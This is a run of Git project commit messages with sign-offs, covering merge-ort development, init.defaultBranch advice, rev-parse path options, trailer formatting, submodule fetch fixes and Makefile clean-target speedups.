Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We would like to be able to make this check before the decision to
rebase is made in a future step. Besides, using a separate helper
makes the code easier to follow.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add code which determines which kind of special rename case each rename
corresponds to, but leave the handling of each type unimplemented for
now. Future commits will implement each one.
There is some tenuous resemblance to merge-recursive's
process_renames(), but comparing the two is very unlikely to yield any
insights. merge-ort's process_renames() is a bit complex and I would
prefer if I could simplify it more, but it is far easier to grok than
merge-recursive's function of the same name in my opinion. Plus,
merge-ort handles more rename conflict types than merge-recursive does.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Based heavily on merge-recursive's get_diffpairs() function, and also
includes the necessary paired call to diff_warn_rename_limit() so that
users will be warned if merge.renameLimit is not sufficiently large for
rename detection to run.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will grow later, but we only need a few fields for basic rename
handling.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update the documentation of the file system monitor extension to
describe version 2.
The format was extended to support opaque tokens in:
56c6910028 fsmonitor: change last update timestamp on the index_state to opaque token
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This was implemented in the 'git multi-pack-index' command and
merged in 468b3221 (Merge branch 'ds/multi-pack-verify',
2018-10-10).
And there's no 'git midx' command.
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To give ample warning for users wishing to override Git's the fall-back
for an unconfigured `init.defaultBranch` (in case we decide to change it
in a future Git version), let's introduce some advice that is shown upon
`git init` when that value is not set.
Note: two test cases in Git's test suite want to verify that the
`stderr` output of `git init` is empty. It is now necessary to suppress
the advice, we now do that via the `init.defaultBranch` setting. While
not strictly necessary, we also set this to `false` in
`test_create_repo()`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are about to introduce a message giving users running `git init` some
advice about `init.defaultBranch`. This will necessarily be done in
`repo_default_branch_name()`.
Not all code paths want to show that advice, though. In particular, the
`git clone` codepath _specifically_ asks for `init_db()` to be quiet,
via the `INIT_DB_QUIET` flag.
In preparation for showing users above-mentioned advice, let's change
the function signature of `get_default_branch_name()` to accept the
parameter `quiet`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In one of the next commits, we would like to give users some advice
regarding the initial branch name, and how to modify it.
To that end, it would be good if `git branch -m <name>` worked in a
freshly initialized repository without any commits. Let's make it so.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our documentation does not mention any future plan to change 'master' to
other value. It is a good idea to document this, though.
Initial-patch-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The focus here is on adding a path_msg() which will queue up
warning/conflict/notice messages about the merge for later processing,
storing these in a pathname -> strbuf map. It might seem like a big
change, but it really just is:
* declaration of necessary map with some comments
* initialization and recording of data
* a bunch of code to iterate over the map at print/free time
* at least one caller in order to avoid an error about having an
unused function (which we provide in the form of implementing
modify/delete conflict handling).
At this stage, it is probably not clear why I am opting for delayed
output processing. There are multiple reasons:
1. Merges are supposed to abort if they would overwrite dirty changes
in the working tree. We cannot correctly determine whether changes
would be overwritten until both rename detection has occurred and
full processing of entries with the renames has finalized.
Warning/conflict/notice messages come up at intermediate codepaths
along the way, so unless we want spurious conflict/warning messages
being printed when the merge will be aborted anyway, we need to
save these messages and only print them when relevant.
2. There can be multiple messages for a single path, and we want all
messages for a give path to appear together instead of having them
grouped by conflict/warning type. This was a problem already with
merge-recursive.c but became even more important due to the
splitting apart of conflict types as discussed in the commit
message for 1f3c9ba707 ("t6425: be more flexible with rename/delete
conflict messages", 2020-08-10)
3. Some callers might want to avoid showing the output in certain
cases, such as if the end result is a clean merge. Rebases have
typically done this.
4. Some callers might not want the output to go to stdout or even
stderr, but might want to do something else with it entirely.
For example, a --remerge-diff option to `git show` or `git log
-p` that remerges on the fly and diffs merge commits against the
remerged version would benefit from stdout/stderr not being
written to in the standard form.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This simplistic and weird-looking patch is here to facilitate future
patch submissions. Adding this stub allows rename detection code to
reference it in one patch series, while a separate patch series can
define the implementation, and then both series can merge cleanly and
work nicely together at that point.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit b658536f59 ("merge-ort: add some high-level algorithm structure",
2020-10-27) added high-level structure of the ort merge algorithm. As
we have added more and more functions, that high-level structure has
been slightly obscured. Since functions are still grouped according to
this high-level structure, add comments denoting sections where all the
functions are specifically tied to a piece of the high-level structure.
This function groupings include a few sub-divisions of the original
high-level structure, including some sub-divisions that are yet to be
submitted. Each has (or will have) several functions all serving as
helpers to one or two main functions for each section.
As an added bonus, the comments will serve to provide a small textual
separation between nearby sections and allow the next three patch series
to be submitted independently and merge cleanly.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This field will be used in future patches to allow removal of paths from
opt->priv->paths.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This field is not yet used, but will be used by both the rename handling
code, and the conflict type handling code in process_entry().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move most of merge_finalize() into a new helper function,
clear_internal_opts(). This is a step to facilitate recursive merges,
as well as some future optimizations.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Include blob.h for definition of blob_type, and commit-reach.h for
declarations of get_merge_bases() and in_merge_bases(). While none of
these are used yet, we want to avoid cross-dependencies in the next
three series of patches for merge-ort and merge them at the end; adding
these "#include"s now avoids textual conflicts.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After checkout(), the working tree has the appropriate contents, and the
index matches the working copy. That means that all unmodified and
cleanly merged files have correct index entries, but conflicted entries
need to be updated.
We do this by looping over the conflicted entries, marking the existing
index entry for the path with CE_REMOVE, adding new higher order staged
for the path at the end of the index (ignoring normal index sort order),
and then at the end of the loop removing the CE_REMOVED-marked cache
entries and sorting the index.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since merge-ort creates a tree for its output, when there are no
conflicts, updating the working tree and index is as simple as using the
unpack_trees() machinery with a twoway_merge (i.e. doing the equivalent
of a "checkout" operation).
If there were conflicts in the merge, then since the tree we created
included all the conflict markers, then using the unpack_trees machinery
in this manner will still update the working tree correctly. Further,
all index entries corresponding to cleanly merged files will also be
updated correctly by this procedure. Index entries corresponding to
conflicted entries will appear as though the user had run "git add -u"
after the merge to accept all files as-is with conflict markers.
Thus, after running unpack_trees(), there needs to be a separate step
for updating the entries in the index corresponding to conflicted files.
This will be the job for the function record_conflicted_index_entris(),
which will be implemented in a subsequent commit.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This adds a basic implementation for merge_switch_to_result(), though
just in terms of a few new empty functions that will be defined in
subsequent commits.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our order for processing of entries means that if we have a tree of
files that looks like
Makefile
src/moduleA/foo.c
src/moduleA/bar.c
src/moduleB/baz.c
src/moduleB/umm.c
tokens.txt
Then we will process paths in the order of the leftmost column below. I
have added two additional columns that help explain the algorithm that
follows; the 2nd column is there to remind us we have oid & mode info we
are tracking for each of these paths (which differs between the paths
which I'm not representing well here), and the third column annotates
the parent directory of the entry:
tokens.txt <version_info> ""
src/moduleB/umm.c <version_info> src/moduleB
src/moduleB/baz.c <version_info> src/moduleB
src/moduleB <version_info> src
src/moduleA/foo.c <version_info> src/moduleA
src/moduleA/bar.c <version_info> src/moduleA
src/moduleA <version_info> src
src <version_info> ""
Makefile <version_info> ""
When the parent directory changes, if it's a subdirectory of the previous
parent directory (e.g. "" -> src/moduleB) then we can just keep appending.
If the parent directory differs from the previous parent directory and is
not a subdirectory, then we should process that directory.
So, for example, when we get to this point:
tokens.txt <version_info> ""
src/moduleB/umm.c <version_info> src/moduleB
src/moduleB/baz.c <version_info> src/moduleB
and note that the next entry (src/moduleB) has a different parent than
the last one that isn't a subdirectory, we should write out a tree for it
100644 blob <HASH> umm.c
100644 blob <HASH> baz.c
then pop all the entries under that directory while recording the new
hash for that directory, leaving us with
tokens.txt <version_info> ""
src/moduleB <new version_info> src
This process repeats until at the end we get to
tokens.txt <version_info> ""
src <new version_info> ""
Makefile <version_info> ""
and then we can write out the toplevel tree. Since we potentially have
entries in our string_list corresponding to multiple different toplevel
directories, e.g. a slightly different repository might have:
whizbang.txt <version_info> ""
tokens.txt <version_info> ""
src/moduleD <new version_info> src
src/moduleC <new version_info> src
src/moduleB <new version_info> src
src/moduleA/foo.c <version_info> src/moduleA
src/moduleA/bar.c <version_info> src/moduleA
When src/moduleA is popped off, we need to know that the "last
directory" reverts back to src, and how many entries in our string_list
are associated with that parent directory. So I use an auxiliary
offsets string_list which would have (parent_directory,offset)
information of the form
"" 0
src 2
src/moduleA 5
Whenever I write out a tree for a subdirectory, I set versions.nr to
the final offset value and then decrement offsets.nr...and then add
an entry to versions with a hash for the new directory.
The idea is relatively simple, there's just a lot of accounting to
implement this.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Create a new function, write_tree(), which will take a list of
basenames, modes, and oids for a single directory and create a tree
object in the object-store. We do not yet have just basenames, modes,
and oids for just a single directory (we have a mixture of entries from
all directory levels in the hierarchy) so we still die() before the
current call to write_tree(), but the next patch will rectify that.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As a step towards transforming the processed path->conflict_info entries
into an actual tree object, start recording basenames, modes, and oids
in a dir_metadata structure. Subsequent commits will make use of this
to actually write a tree.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We want to handle paths below a directory before needing to handle the
directory itself. Also, we want to handle the directory immediately
after the paths below it, so we can't use simple lexicographic ordering
from strcmp (which would insert foo.txt between foo and foo/file.c).
Copy string_list_df_name_compare() from merge-recursive.c, and set up a
string list of paths sorted by that function so that we can iterate in
the desired order.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a process_entries() implementation that just loops over the paths
and processes each one individually with an auxiliary process_entry()
call. Add a basic process_entry() as well, which handles several cases
but leaves a few of the more involved ones with die-not-implemented
messages. Also, although process_entries() is supposed to create a
tree, it does not yet have code to do so -- except in the special case
of merging completely empty trees.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When all three trees have the same oid, there is no need to recurse into
these trees to find that all files within them happen to match. We can
just record any one of the trees as the resolution of merging that
particular path.
Immediately resolving trees for other types of trivial tree merges (such
as one side matches the merge base, or the two sides match each other)
would prevent us from detecting renames for some paths, and thus prevent
us from doing three-way content merges for those paths whose renames we
did not detect.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Create a helper function, setup_path_info(), which can be used to record
all the information we want in a merged_info or conflict_info. While
there is currently only one caller of this new function, and some of its
particular parameters are fixed, future callers of this function will be
added later.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Three-way merges, by their nature, are going to often have two or more
trees match at a given subdirectory. We can avoid calling
fill_tree_descriptor() on the same tree by checking when these trees
match. Noting when various oids match will also be useful in other
calculations and optimizations as well.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This does not actually collect any necessary info other than the
pathnames involved, since it just allocates an all-zero conflict_info
and stuffs that into paths. However, it invokes the traverse_trees()
machinery to walk over all the paths and sets up the basic
infrastructure we need.
I have left out a few obvious optimizations to try to make this patch as
short and obvious as possible. A subsequent patch will add some of
those back in with some more useful data fields before we introduce a
patch that actually sets up the conflict_info fields.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Various places in merge-recursive used an err() function when it hit
some kind of unrecoverable error. That code was from the reusable bits
of merge-recursive.c that we liked, such as merge_3way, writing object
files to the object store, reading blobs from the object store, etc. So
create a similar function to allow us to port that code over, and use it
for when we detect problems returned from collect_merge_info()'s
traverse_trees() call, which we will be adding next.
While we are at it, also add more documentation for the "clean" field
from struct merge_result, particularly since the name suggests a boolean
but it is not quite one and this is our first non-boolean usage.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In my cursory investigation, histogram diffs are about 2% slower than
Myers diffs. Others have probably done more detailed benchmarks. But,
in short, histogram diffs have been around for years and in a number of
cases provide obviously better looking diffs where Myers diffs are
unintelligible but the performance hit has kept them from becoming the
default.
However, there are real merge bugs we know about that have triggered on
git.git and linux.git, which I don't have a clue how to address without
the additional information that I believe is provided by histogram
diffs. See the following:
https://lore.kernel.org/git/20190816184051.GB13894@sigill.intra.peff.net/https://lore.kernel.org/git/CABPp-BHvJHpSJT7sdFwfNcPn_sOXwJi3=o14qjZS3M8Rzcxe2A@mail.gmail.com/https://lore.kernel.org/git/CABPp-BGtez4qjbtFT1hQoREfcJPmk9MzjhY5eEq1QhXT23tFOw@mail.gmail.com/
I don't like mismerges. I really don't like silent mismerges. While I
am sometimes willing to make performance and correctness tradeoff, I'm
much more interested in correctness in general. I want to fix the above
bugs. I have not yet started doing so, but I believe histogram diff at
least gives me an angle. Unfortunately, I can't rely on using the
information from histogram diff unless it's in use. And it hasn't been
used because of a few percentage performance hit.
In testcases I have looked at, merge-ort is _much_ faster than
merge-recursive for non-trivial merges/rebases/cherry-picks. As such,
this is a golden opportunity to switch out the underlying diff algorithm
(at least the one used by the merge machinery; git-diff and git-log are
separate questions); doing so will allow me to get additional data and
improved diffs, and I believe it will help me fix the above bugs at some
point in the future.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
merge_start() basically does a bunch of sanity checks, then allocates
and initializes opt->priv -- a struct merge_options_internal.
Most of the sanity checks are usable as-is. The
allocation/intialization is a bit different since merge-ort has a very
different merge_options_internal than merge-recursive, but the idea is
the same.
The weirdest part here is that merge-ort and merge-recursive use the
same struct merge_options, even though merge_options has a number of
fields that are oddly specific to merge-recursive's internal
implementation and don't even make sense with merge-ort's high-level
design (e.g. buffer_output, which merge-ort has to always do). I reused
the same data structure because:
* most the fields made sense to both merge algorithms
* making a new struct would have required making new enums or somehow
externalizing them, and that was getting messy.
* it simplifies converting the existing callers by not having to
have different code paths for merge_options setup.
I also marked detect_renames as ignored. We can revisit that later, but
in short: merge-recursive allowed turning off rename detection because
it was sometimes glacially slow. When you speed something up by a few
orders of magnitude, it's worth revisiting whether that justification is
still relevant. Besides, if folks find it's still too slow, perhaps
they have a better scaling case than I could find and maybe it turns up
some more optimizations we can add. If it still is needed as an option,
it is easy to add later.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
merge_ort_nonrecursive_internal() will be used by both
merge_inmemory_nonrecursive() and merge_inmemory_recursive(); let's
focus on it for now. It involves some setup -- merge_start() --
followed by the following chain of functions:
collect_merge_info()
This function will populate merge_options_internal's paths field,
via a call to traverse_trees() and a new callback that will be added
later.
detect_and_process_renames()
This function will detect renames, and then adjust entries in paths
to move conflict stages from old pathnames into those for new
pathnames, so that the next step doesn't have to think about renames
and just can do three-way content merging and such.
process_entries()
This function determines how to take the various stages (versions of
a file from the three different sides) and merge them, and whether
to mark the result as conflicted or cleanly merged. It also writes
out these merged file versions as it goes to create a tree.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Set up some basic internal data structures. The only carry-over from
merge-recursive.c is call_depth, though needed_rename_limit will be
added later.
The central piece of data will definitely be the strmap "paths", which
will map every relevant pathname under consideration to either a
merged_info or a conflict_info. ("conflicted" is a strmap that is a
subset of "paths".)
merged_info contains all relevant information for a non-conflicted
entry. conflict_info contains a merged_info, plus any additional
information about a conflict such as the higher orders stages involved
and the names of the paths those came from (handy once renames get
involved). If an entry remains conflicted, the merged_info portion of a
conflict_info will later be filled with whatever version of the file
should be placed in the working directory (e.g. an as-merged-as-possible
variation that contains conflict markers).
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
git rev-parse has several options which print various paths. Some of
these paths are printed relative to the current working directory, and
some are absolute.
Normally, this is not a problem, but there are times when one wants
paths entirely in one format or another. This can be done trivially if
the paths are canonical, but canonicalizing paths is not possible on
some shell scripting environments which lack realpath(1) and also in Go,
which lacks functions that properly canonicalize paths on Windows.
To help out the scripter, let's provide an option which turns most of
the paths printed by git rev-parse to be either relative to the current
working directory or absolute and canonical. Document which options are
affected and which are not so that users are not confused.
This approach is cleaner and tidier than providing duplicates of
existing options which are either relative or absolute.
Note that if the user needs both forms, it is possible to pass an
additional option in the middle of the command line which changes the
behavior of subsequent operations.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, we have a function to resolve paths, strbuf_realpath. This
function canonicalizes paths like realpath(3), but permits a trailing
component to be absent from the file system. In other words, this is
the behavior of the GNU realpath(1) without any arguments.
In the future, we'll need this same behavior, except that we want to
allow for any number of missing trailing components, which is the
behavior of GNU realpath(1) with the -m option. This is useful because
we'll want to canonicalize a path that may point to a not yet present
path under the .git directory. For example, a user may want to know
where an arbitrary ref would be stored if it existed in the file system.
Let's refactor strbuf_realpath to move most of the code to an internal
function and then pass it two flags to control its behavior. We'll add
a strbuf_realpath_forgiving function that has our new behavior, and
leave strbuf_realpath with the older, stricter behavior.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use --fixed-value in git-config calls in the git-maintenance tests, so
that the tests will continue to work even if the repo path contains
regexp metacharacters.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a "key_value_separator" option to the "%(trailers)" pretty format,
to go along with the existing "separator" argument. In combination
these two options make it trivial to produce machine-readable (e.g. \0
and \0\0-delimited) format output.
As elaborated on in a previous commit which added "keyonly" it was
needlessly tedious to extract structured data from "%(trailers)"
before the addition of this "key_value_separator" option. As seen by
the test being added here extracting this data now becomes trivial.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add support for a "keyonly". This allows for easier parsing out of the
key and value. Before if you didn't want to make assumptions about how
the key was formatted. You'd need to parse it out as e.g.:
--pretty=format:'%H%x00%(trailers:separator=%x00%x00)' \
'%x00%(trailers:separator=%x00%x00,valueonly)'
And then proceed to deduce keys by looking at those two and
subtracting the value plus the hardcoded ": " separator from the
non-valueonly %(trailers) line. Now it's possible to simply do:
--pretty=format:'%H%x00%(trailers:separator=%x00%x00,keyonly)' \
'%x00%(trailers:separator=%x00%x00,valueonly)'
Which at least reduces it to a state machine where you get N keys and
correlate them with N values. Even better would be to have a way to
change the ": " delimiter to something easily machine-readable (a key
might contain ": " too). A follow-up change will add support for that.
I don't really have a use-case for just "keyonly" myself. I suppose it
would be useful in some cases as "key=*" matches case-insensitively,
so a plain "keyonly" will give you the variants of the keys you
matched. I'm mainly adding it to fix the inconsistency with
"valueonly".
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix %(trailers:valueonly) being a noop due to on overly eager
optimization in format_trailer_info() which skips custom formatting if
no custom options are given.
When "valueonly" was added in d9b936db52 (pretty: add support for
"valueonly" option in %(trailers), 2019-01-28) we forgot to add it to
the list of options that optimization checks for. See e.g. the
addition of "key" in 250bea0c16 (pretty: allow showing specific
trailers, 2019-01-28) for a similar change where this wasn't missed.
Thus the "valueonly" option in "%(trailers:valueonly)" was a noop and
the output was equivalent to that of a plain "%(trailers)". This
wasn't caught because the tests for it always combined it with other
options.
Fix the bug by adding !opts->value_only to the list. I initially
attempted to make this more future-proof by setting a flag if we got
to ":" in "%(trailers:" in format_commit_one() in pretty.c. However,
"%(trailers:" is also parsed in trailers_atom_parser() in
ref-filter.c.
There is an outstanding patch[1] unify those two, and such a fix, or
other future-proofing, such as changing "process_trailer_options"
flags into a bitfield, would conflict with that effort. Let's instead
do the bare minimum here as this aspect of trailers is being actively
worked on by another series.
Let's also test for a plain "valueonly" without any other options, as
well as "separator". All the other existing options on the pretty.c
path had tests where they were the only option provided. I'm also
keeping a sanity test for "%(trailers:)" being the same as
"%(trailers)". There's no reason to suspect it wouldn't be in the
current implementation, but let's keep it in the interest of black box
testing.
1. https://lore.kernel.org/git/pull.726.git.1599335291.gitgitgadget@gmail.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the documentation for the various %(trailers) options so it
isn't repeating part of the documentation for "only" about how boolean
values are handled. Instead, let's split the description of that into
general documentation at the top.
It then suffices to refer to it by listing the options as
"opt[=<BOOL>]". I'm also changing it to upper-case "[=<BOOL>]" from
"[=val]" for consistency with "<SEP>"
It took me a couple of readings to realize that these options were
referring back to the "only" option's treatment of boolean
values.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A regression has been introduced by a62387b (submodule.c: fetch in
submodules git directory instead of in worktree, 2018-11-28).
The scenario in which it triggers is when one has a repository with a
submodule inside a submodule like this:
superproject/middle_repo/inner_repo
Person A and B have both a clone of it, while Person B is not working
with the inner_repo and thus does not have it initialized in his working
copy.
Now person A introduces a change to the inner_repo and propagates it
through the middle_repo and the superproject.
Once person A pushed the changes and person B wants to fetch them using
"git fetch" at the superproject level, B's git call will return with
error saying:
Could not access submodule 'inner_repo'
Errors during submodule fetch:
middle_repo
Expectation is that in this case the inner submodule will be recognized
as uninitialized submodule and skipped by the git fetch command.
This used to work correctly before 'a62387b (submodule.c: fetch in
submodules git directory instead of in worktree, 2018-11-28)'.
Starting with a62387b the code wants to evaluate "is_empty_dir()" inside
.git/modules for a directory only existing in the worktree, delivering
then of course wrong return value.
This patch ensures is_empty_dir() is getting the correct path of the
uninitialized submodule by concatenation of the actual worktree and the
name of the uninitialized submodule.
The first attempt to fix this regression, in 1b7ac4e6d4 (submodules:
fix of regression on fetching of non-init subsub-repo, 2020-11-12), by
simply reverting a62387b, resulted in an infinite loop of submodule
fetches in the simpler case of a recursive fetch of a superproject with
uninitialized submodules, and so this commit was reverted in 7091499bc0
(Revert "submodules: fix of regression on fetching of non-init
subsub-repo", 2020-12-02).
To prevent future breakages, also add a regression test for this
scenario.
Signed-off-by: Peter Kaestle <peter.kaestle@nokia.com>
CC: Junio C Hamano <gitster@pobox.com>
CC: Philippe Blain <levraiphilippeblain@gmail.com>
CC: Ralf Thielow <ralf.thielow@gmail.com>
CC: Eric Sunshine <sunshine@sunshineco.us>
Reviewed-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'dist' target uses a versioned temp directory, $(GIT_TARNAME), into
which it copies various files added to the distribution tarball. Should
it be necessary to remove this directory in the 'clean' target, since
the name depends on $(GIT_VERSION), the current HEAD must be positioned
on the same commit as when 'make dist' was issued. Otherwise, the target
will fail to remove that directory.
Create an '.dist-tmp-dir' directory and copy the various files into this
now un-versioned directory while creating the distribution tarball. Change
the 'clean' target to remove the '.dist-tmp-dir' directory, instead of the
version dependent $(GIT_TARNAME) directory.
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'clean' target includes code to remove an '*.tar.gz' file that
was the by-product of a debian build. This was originally added by
commit 5a571cdd8a (Clean generated files a bit more, to cope with
Debian build droppings., 2005-08-12). However, all support for the
'debian build' was dropped by commit 7d0e65b892 (Retire debian/
directory., 2006-01-06), which seems to have simply forgotten to
remove the 'git-core_$(GIT_VERSION)-*.tar.gz' from the 'clean'
target. Remove it now.
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'clean' target is still noticeably slow on cygwin, despite the
improvements made by previous patches. For example, the second
invocation of 'make clean' below:
$ make clean >/dev/null 2>&1
$ make clean
...
make[1]: Entering directory '/home/ramsay/git/gitweb'
make[2]: Entering directory '/home/ramsay/git'
make[2]: 'GIT-VERSION-FILE' is up to date.
make[2]: Leaving directory '/home/ramsay/git'
...
$
has been timed at 10.361s on my laptop (an old core i5-4200M @ 2.50GHz,
8GB RAM, 1TB HDD).
Notice that the 'clean' target is making a nested call to the parent
Makefile to ensure that the GIT-VERSION-FILE is up-to-date. This is to
ensure that the $(GIT_VERSION) make variable is set, once that file had
been included. However, the 'clean' target does not use the $(GIT_VERSION)
variable, directly or indirectly, so it does not have any affect on what
the target removes. Therefore, the time spent on ensuring an up to date
GIT-VERSION-FILE is wasted effort.
In order to eliminate such wasted effort, use the value of the internal
$(MAKECMDGOALS) variable to only '-include ../GIT-VERSION-FILE' when the
target is not 'clean'. (This drops the time down to 8.430s, on my laptop,
giving an improvement of 18.64%).
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'clean' target is still noticeably slow on cygwin, despite the
substantial improvement made by the previous patch. For example, the
second invocation of 'make clean' below:
$ make clean >/dev/null 2>&1
$ make clean
...
make[1]: Entering directory '/home/ramsay/git/Documentation'
make[2]: Entering directory '/home/ramsay/git'
make[2]: 'GIT-VERSION-FILE' is up to date.
make[2]: Leaving directory '/home/ramsay/git'
...
$
has been timed at 12.364s on my laptop (an old core i5-4200M @ 2.50GHz,
8GB RAM, 1TB HDD).
Notice that the 'clean' target is making a nested call to the parent
Makefile to ensure that the GIT-VERSION-FILE is up-to-date (prior to
the previous patch, there would have been _two_ such invocations).
This is to ensure that the $(GIT_VERSION) make variable is set, once
that file had been included. However, the 'clean' target does not use
the $(GIT_VERSION) variable, directly or indirectly, so it does not
have any affect on what the target removes. Therefore, the time spent
on ensuring an up to date GIT-VERSION-FILE is wasted effort.
In order to eliminate such wasted effort, use the value of the internal
$(MAKECMDGOALS) variable to only '-include ../GIT-VERSION-FILE' when the
target is not 'clean'. (This drops the time down to 10.361s, on my laptop,
giving an improvement of 16.20%).
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'clean' target is noticeably slow on cygwin, even for a 'do-nothing'
invocation of 'make clean'. For example, the second 'make clean' below:
$ make clean >/dev/null 2>&1
$ make clean
GIT_VERSION = 2.29.0
...
make[1]: Entering directory '/home/ramsay/git/Documentation'
GEN mergetools-list.made
GEN cmd-list.made
GEN doc.dep
...
$
has been timed at 23.339s, using git v2.29.0, on my laptop (an old core
i5-4200M @ 2.50GHz, 8GB RAM, 1TB HDD).
Notice that, since the 'doc.dep' file does not exist, make takes the
time (about 8s) to generate several files in order to create the doc.dep
include file. (If an 'include' file is missing, but a target for the
said file is present in the Makefile, make will execute that target
and, if that file now exists, throw away all its internal data and
re-read and re-parse the Makefile). Having spent the time to include
the 'doc.dep' file, the 'clean' target immediately deletes those files.
The document dependencies specified in the 'doc.dep' include file,
expressed as make targets and prerequisites, do not affect what the
'clean' target removes. Therefore, the time spent in generating the
dependencies is completely wasted effort.
In order to eliminate such wasted effort, use the value of the internal
$(MAKECMDGOALS) variable to only '-include doc.dep' when the target is
not 'clean'. (This drops the time down to 12.364s, on my laptop, giving
an improvement of 47.02%).
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git imap-send" used to ignore configuration variables like
core.askpass; this has been corrected.
* nm/imap-send-use-default-config:
imap-send: parse default git config
Non-reentrant time-related library functions and ctime/asctime with
awkward calling interfaces are banned from the codebase.
* jk/banned:
banned.h: mark ctime_r() and asctime_r() as banned
banned.h: mark non-reentrant gmtime, etc as banned
"git maintenance run/start/stop" needed to be run in a repository
to hold the lockfile they use, but didn't make sure they are
actually in a repository, which has been corrected.
* rs/maintenance-run-outside-repo:
t7900: fix typo: "test_execpt_success"
maintenance: fix SEGFAULT when no repository
"fetch-pack" could pass NULL pointer to unlink(2) when it sees an
invalid filename; the error checking has been tightened to make
this impossible.
* rs/fetch-pack-invalid-lockfile:
fetch-pack: disregard invalid pack lockfiles
Code clean-up.
* ma/grep-init-default:
MyFirstObjectWalk: drop `init_walken_defaults()`
grep: copy struct in one fell swoop
grep: use designated initializers for `grep_defaults`
grep: don't set up a "default" repo for grep
